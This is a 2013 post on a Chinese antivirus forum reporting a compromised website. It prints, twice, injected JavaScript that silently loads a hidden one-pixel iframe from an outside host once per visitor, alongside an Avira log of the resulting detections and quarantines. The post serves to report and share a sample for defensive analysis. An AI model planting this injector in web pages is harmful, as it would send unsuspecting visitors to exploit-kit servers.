查看: 910|回复: 0
收起左侧

[已鉴定] http://www.nrgconservation.com/index.php/insulation-l=

[复制链接]
fireold
发表于 2013-7-10 06:27:01 | 显示全部楼层 |阅读模式
  1. function zzzfff() {
  2.      var iyrg = document.createElement('iframe');

  3.      iyrg.src = 'http://alldesign-jp.fool.jp/counter.php';
  4.      iyrg.style.position = 'absolute';
  5.      iyrg.style.border = '0';
  6.      iyrg.style.height = '1px';
  7.      iyrg.style.width = '1px';
  8.      iyrg.style.left = '1px';
  9.      iyrg.style.top = '1px';

  10.      if (!document.getElementById('iyrg')) {
  11.          document.write('<div id=\'iyrg\'></div>');
  12.          document.getElementById('iyrg').appendChild(iyrg);
  13.      }
  14. }

  15. function SetCookie(cookieName, cookieValue, nDays, path) {
  16.      var today = new Date();
  17.      var expire = new Date();
  18.      if (nDays == null || nDays == 0) nDays = 1;
  19.      expire.setTime(today.getTime() + 3600000 * 24 * nDays);
  20.      document.cookie = cookieName + "=" + escape(cookieValue) + ";expires=" + expire.toGMTString() + ((path) ? "; path=" + path : "");
  21. }

  22. function GetCookie(name) {
  23.      var start = document.cookie.indexOf(name + "=");
  24.      var len = start + name.length + 1;
  25.      if ((!start) && (name != document.cookie.substring(0, name.length))) {
  26.          return null;
  27.      }
  28.      if (start == -1) return null;
  29.      var end = document.cookie.indexOf(";", len);
  30.      if (end == -1) end = document.cookie.length;
  31.      return unescape(document.cookie.substring(len, end));
  32. }
  33. if (navigator.cookieEnabled) {
  34.      if (GetCookie('visited_uq') == 55) {} else {
  35.          SetCookie('visited_uq', '55', '1', '/');

  36.          zzzfff();
  37.      }
  38. }
复制代码

  1. function zzzfff() {
  2.      var y = document.createElement('iframe');

  3.      y.src = 'http://alldesign-jp.fool.jp/counter.php';
  4.      y.style.position = 'absolute';
  5.      y.style.border = '0';
  6.      y.style.height = '1px';
  7.      y.style.width = '1px';
  8.      y.style.left = '1px';
  9.      y.style.top = '1px';

  10.      if (!document.getElementById('y')) {
  11.          document.write('<div id=\'y\'></div>');
  12.          document.getElementById('y').appendChild(y);
  13.      }
  14. }

  15. function SetCookie(cookieName, cookieValue, nDays, path) {
  16.      var today = new Date();
  17.      var expire = new Date();
  18.      if (nDays == null || nDays == 0) nDays = 1;
  19.      expire.setTime(today.getTime() + 3600000 * 24 * nDays);
  20.      document.cookie = cookieName + "=" + escape(cookieValue) + ";expires=" + expire.toGMTString() + ((path) ? "; path=" + path : "");
  21. }

  22. function GetCookie(name) {
  23.      var start = document.cookie.indexOf(name + "=");
  24.      var len = start + name.length + 1;
  25.      if ((!start) && (name != document.cookie.substring(0, name.length))) {
  26.          return null;
  27.      }
  28.      if (start == -1) return null;
  29.      var end = document.cookie.indexOf(";", len);
  30.      if (end == -1) end = document.cookie.length;
  31.      return unescape(document.cookie.substring(len, end));
  32. }
  33. if (navigator.cookieEnabled) {
  34.      if (GetCookie('visited_uq') == 55) {} else {
  35.          SetCookie('visited_uq', '55', '1', '/');

  36.          zzzfff();
  37.      }
  38. }
复制代码


Avira
2013/7/10 上午 06:21 [System Scanner] 發現惡意程式碼
      檔案 'C:\Users\vardon\AppData\Local\Microsoft\Windows\Temporary Internet
      Files\Low\Content.IE5\5TH1K21Z\jquery.stringball[1].js'
      包含病毒或有害的程式 'JS/Expack.CM.4' [virus]
      已採取動作:
      檔案會移動至 '55c322fb.qua' 名稱底下的隔離區目錄。.

2013/7/10 上午 06:21 [System Scanner] 掃描
      掃描結束 [已完成全部的掃描。]。
      檔案數:        803
      目錄數:        0
      惡意程式碼數:        1
      警告數:        0

2013/7/10 上午 06:21 [System Scanner] 掃描
      掃描結束 [已完成全部的掃描。]。
      檔案數:        803
      目錄數:        0
      惡意程式碼數:        1
      警告數:        0

2013/7/10 上午 06:21 [System Scanner] 發現惡意程式碼
      檔案 'C:\Users\vardon\AppData\Local\Microsoft\Windows\Temporary Internet
      Files\Low\Content.IE5\UL724GWW\jquery.jqtransform[1].js'
      包含病毒或有害的程式 'JS/Expack.CM.4' [virus]
      已採取動作:
      檔案會移動至 '5a0d22a8.qua' 名稱底下的隔離區目錄。.

2013/7/10 上午 06:20 [Web Protection] 發現惡意程式碼
      從 URL "http://www.nrgconservation.com/ext/js/imagepreloader.js" 存取資料時,
      發現病毒或有害的程式 'JS/Expack.CM.4' [virus]。
      已採取動作:將檔案移至隔離區

2013/7/10 上午 06:20 [Web Protection] 發現惡意程式碼
      從 URL "http://www.nrgconservation.com/ext/jquery/jquery.nivo.slider.js" 存取資料時,
      發現病毒或有害的程式 'JS/Expack.CM.4' [virus]。
      已採取動作:封鎖的檔案

2013/7/10 上午 06:20 [Web Protection] 發現惡意程式碼
      從 URL "http://www.nrgconservation.com/ext/jquery/ui/jquery-ui-1.8.6.min.js"
      存取資料時,
      發現病毒或有害的程式 'JS/Expack.CM.4' [virus]。
      已採取動作:封鎖的檔案

2013/7/10 上午 06:20 [Real-Time Protection] 發現惡意程式碼
      在檔案 'C:\Users\vardon\AppData\Local\Microsoft\Windows\Temporary Internet
      Files\Low\Content.IE5\5TH1K21Z\jquery.stringball[1].js 中
      偵測到病毒或有害的程式 'JS/Expack.CM.4 [virus]'
      執行的動作:傳輸至掃描程式

2013/7/10 上午 06:20 [Real-Time Protection] 發現惡意程式碼
      在檔案 'C:\Users\vardon\AppData\Local\Microsoft\Windows\Temporary Internet
      Files\Low\Content.IE5\UL724GWW\jquery.jqtransform[1].js 中
      偵測到病毒或有害的程式 'JS/Expack.CM.4 [virus]'
      執行的動作:拒絕存取

2013/7/10 上午 06:20 [Web Protection] 封鎖的網頁
      URL (http://www.nrgconservation.com/ext/js/js.js) 的評估結果為 惡意程式碼,而遭到封鎖。

2013/7/10 上午 06:20 [Web Protection] 發現惡意程式碼
      從 URL "http://www.nrgconservation.com/ext/jquery/jquery.equalheights.js" 存取資料時,
      發現病毒或有害的程式 'JS/Expack.CM.4' [virus]。
      已採取動作:封鎖的檔案

2013/7/10 上午 06:20 [Web Protection] 發現惡意程式碼
      從 URL "http://www.nrgconservation.com/ext/jquery/jquery-1.7.2.min.js" 存取資料時,
      發現病毒或有害的程式 'JS/Expack.CM.4' [virus]。
      已採取動作:封鎖的檔案

2013/7/10 上午 06:20 [Web Protection] 發現惡意程式碼
      從 URL "http://www.nrgconservation.com/ext/jquery/ui/jquery-ui-1.8.6.min.js"
      存取資料時,
      發現病毒或有害的程式 'JS/Expack.CM.4' [virus]。
      已採取動作:封鎖的檔案

2013/7/10 上午 06:20 [Web Protection] 發現惡意程式碼
      從 URL "http://www.nrgconservation.com/ext/js/xeasyTooltipIMG.js" 存取資料時,
      發現病毒或有害的程式 'JS/Expack.CM.4' [virus]。
      已採取動作:封鎖的檔案

2013/7/10 上午 06:20 [Web Protection] 發現惡意程式碼
      從 URL "http://www.nrgconservation.com/ext/jquery/jquery-1.7.2.min.js" 存取資料時,
      發現病毒或有害的程式 'JS/Expack.CM.4' [virus]。
      已採取動作:封鎖的檔案

2013/7/10 上午 06:20 [Web Protection] 發現惡意程式碼
      從 URL
      "http://www.nrgconservation.com/ext/jquery/fancybox/jquery.fancybox-1.3.4.pack.j
      s" 存取資料時,
      發現病毒或有害的程式 'JS/Expack.CM.4' [virus]。
      已採取動作:封鎖的檔案

2013/7/10 上午 06:20 [Web Protection] 發現惡意程式碼
      從 URL
      "http://www.nrgconservation.com/ext/jquery/bxGallery/jquery.bxGallery.1.1.min.js
      " 存取資料時,
      發現病毒或有害的程式 'JS/Expack.CM.4' [virus]。
      已採取動作:封鎖的檔案

2013/7/10 上午 06:20 [Web Protection] 發現惡意程式碼
      從 URL
      "http://www.nrgconservation.com/ext/jquery/bxGallery/jquery.bxGallery.1.1.min.js
      " 存取資料時,
      發現病毒或有害的程式 'JS/Expack.CM.4' [virus]。
      已採取動作:封鎖的檔案

2013/7/10 上午 06:20 [Web Protection] 發現惡意程式碼
      從 URL "http://www.nrgconservation.com/ext/jquery/jquery.stringball.js" 存取資料時,
      發現病毒或有害的程式 'JS/Expack.CM.4' [virus]。
      已採取動作:已略過

2013/7/10 上午 06:20 [Real-Time Protection] 發現惡意程式碼
      在檔案 'C:\Users\vardon\AppData\Local\Microsoft\Windows\Temporary Internet
      Files\Low\Content.IE5\UL724GWW\jquery.jqtransform[1].js 中
      偵測到病毒或有害的程式 'JS/Expack.CM.4 [virus]'
      執行的動作:傳輸至掃描程式

2013/7/10 上午 06:20 [Web Protection] 發現惡意程式碼
      從 URL
      "http://www.nrgconservation.com/ext/jquery/jqtransformplugin/jquery.jqtransform.
      js" 存取資料時,
      發現病毒或有害的程式 'JS/Expack.CM.4' [virus]。
      已採取動作:已略過

2013/7/10 上午 06:20 [Real-Time Protection] 發現惡意程式碼
      在檔案 'C:\Users\vardon\AppData\Local\Microsoft\Windows\Temporary Internet
      Files\Low\Content.IE5\VUGD722P\insulation-l=[1].htm 中
      偵測到病毒或有害的程式 'JS/BlacoleRef.CZ.29 [virus]'
      執行的動作:拒絕存取

2013/7/10 上午 06:20 [Web Protection] 發現惡意程式碼
      從 URL "http://www.nrgconservation.com/index.php/insulation-l=" 存取資料時,
      發現病毒或有害的程式 'JS/BlacoleRef.CZ.29' [virus]。
      已採取動作:已略過


fs3.jpg
您需要登录后才可以回帖 登录 | 快速注册

本版积分规则

手机版|杀毒软件|软件论坛| 卡饭论坛

Copyright © KaFan  KaFan.cn All Rights Reserved.

Powered by Discuz! X3.4( 沪ICP备2020031077号-2 ) GMT+8, 2024-12-26 00:03 , Processed in 0.135030 second(s), 19 queries .

卡饭网所发布的一切软件、样本、工具、文章等仅限用于学习和研究,不得将上述内容用于商业或者其他非法用途,否则产生的一切后果自负,本站信息来自网络,版权争议问题与本站无关,您必须在下载后的24小时之内从您的电脑中彻底删除上述信息,如有问题请通过邮件与我们联系。

快速回复 客服 返回顶部 返回列表